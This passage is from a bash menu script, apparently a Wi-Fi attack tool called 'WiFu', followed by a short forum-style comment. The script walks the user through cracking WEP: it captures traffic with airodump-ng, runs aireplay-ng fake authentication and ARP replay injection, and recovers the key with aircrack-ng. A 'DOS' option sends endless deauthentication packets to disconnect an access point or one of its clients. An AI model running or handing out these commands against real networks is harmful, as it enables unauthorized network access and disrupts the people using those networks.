]] ; do echo -e " \e[1;34m[*]\e[0m What do you want to name the capture file? " read name if [[ $name == "" ]] ; then clear echo -e " \e[1;31m[!]\e[0m You didn't type anything. Please try again. " sleep 3 elif [[ $name == * ]] ; then qthree=0 fi done clear echo -e " \e[1;34m[*]\e[0m You now have 10 seconds to close the previousely opened tab. GO! " sleep 10 clear konsole --new-tab -e airodump-ng -c $chan -w $name --bssid $bssid mon0 2>>.trash.txt echo -e " \e[1;34m[*]\e[0m OK, now starting WEP attack? " konsole --new-tab -e aireplay-ng -1 0 -a $bssid mon0 clear konsole --new-tab -e aireplay-ng -3 -b $bssid mon0 echo -e " \e[1;34m[*]\e[0m Wait a minute or two and watch the data rise in the first window that initially opened. " sleep 3 dat=1 while [[ $dat == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m Has the data risen to over 5K? [y|n] " read data if [[ $data == y ]] ; then clear echo -e " \e[1;34m[*]\e[0m OK, time to crack the capture file! " sleep 3 dat=0 elif [[ $hand == n ]] ; then clear echo -e " \e[1;34m[*]\e[0m OK, lets try again. You can press \e[1;31mCtrl+C\e[0m to go back to the main menu. " sleep 3 clear else clear echo -e " \e[1;31m[!]\e[0m Invalid operation. Please try again. " fi done aircrack-ng -l ~/cracked-password.txt ~/$name-01.cap || { echo -e ' \e[1;31m[!]\e[0m Operation failed! Program will now exit. ' ; exit 1; } echo -e " \e[1;32mAll Done!!!\e[0m - If your passphrase was found then it is shown above and was saved to cracked-password.txt in your home directory. Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu. " ;; ############### Start DOS "DOS") ncard=1 while [[ $ncard == 1 ]] ; do clear echo -e ifconfig | grep wlan echo -e " \e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0] " read card if [[ $card == "" ]] ; then card=wlan0 fi if [[ $card == wlan* ]] ; then clear ncard=0 else clear echo -e " \e[1;31m[!]\e[0m Not a valid wireless device. Please try again." sleep 3 fi done clear airmon-ng start $card >>.trash.txt echo -e " \e[1;34m[*]\e[0m New tabs will open running various commands to gather info. Come back to this tab to input data. " sleep 5 konsole --new-tab -e airodump-ng mon0 2>>.trash.txt deny=1 while [[ $deny == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m Who is the victim of this attack? [1|2] 1) Access Point. 2) Connected Client. " read who if [[ $who == "1" ]] ; then clear deny=0 elif [[ $who == "2" ]] ; then clear deny=0 else echo -e " \e[1;31m[!]\e[0m $who is not a valid entry. Please try again. " sleep 3 fi done if [[ $who == "1" ]] ; then qone=1 while [[ $qone == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What is the BSSID of the acces point you want to attack? " read bssid if [[ $bssid == "" ]] ; then echo -e " \e[1;31m[!]\e[0m You didn't type anything. Please try again. " sleep 3 elif [[ $bssid == * ]] ; then echo -e " \e[1;34m[*]\e[0m OK. Now starting the DOS attack. " sleep 3 aireplay-ng -0 9999 -a $bssid mon0 || { echo -e ' \e[1;31m[!]\e[0m Operation failed! Program will now exit. ' ; exit 1; } fi done else qtwo=1 while [[ $qtwo == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What is the BSSID of the acces point you want to attack? " read bssid if [[ $bssid == "" ]] ; then echo -e " \e[1;31m[!]\e[0m You didn't type anything. Please try again. " sleep 3 elif [[ $bssid == * ]] ; then clear qtwo=0 fi done qthree=1 while [[ $qthree == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What is the clients station ID? " read station if [[ $station == "" ]] ; then echo -e " \e[1;31m[!]\e[0m You didn't type anything. Please try again. " sleep 3 elif [[ $station == * ]] ; then clear qthree=0 fi done fi echo -e " \e[1;34m[*]\e[0m OK. Now starting the DOS attack. " sleep 3 aireplay-ng -0 9999 -a $bssid -c $station mon0 || { echo -e ' \e[1;31m[!]\e[0m Operation failed! Program will now exit. ' ; exit 1; } ;; ###################### Start Main Menu "Main Menu") break ;; ################### Start Quit "Quit") clear echo -e " \e[5;31mT\e[5;32mh\e[5;33ma\e[5;34mn\e[5;35mk \e[5;36mY\e[5;37mo\e[5;31mu \e[5;32mF\e[5;33mo\e[5;34mr \e[5;35mU\e[5;36ms\e[5;37mi\e[5;31mn\e[5;31mg \e[5;32mW\e[5;33mi\e[5;34mF\e[5;35mu\e[5;36m!\e[5;37m!\e[5;31m!\e[0m " exit 1 ;; *) echo -e " \e[1;31m[!]\e[0m Please choose a valid operation..." sleep 3 break esac done done

i think it is prefferance what one is better, but have fun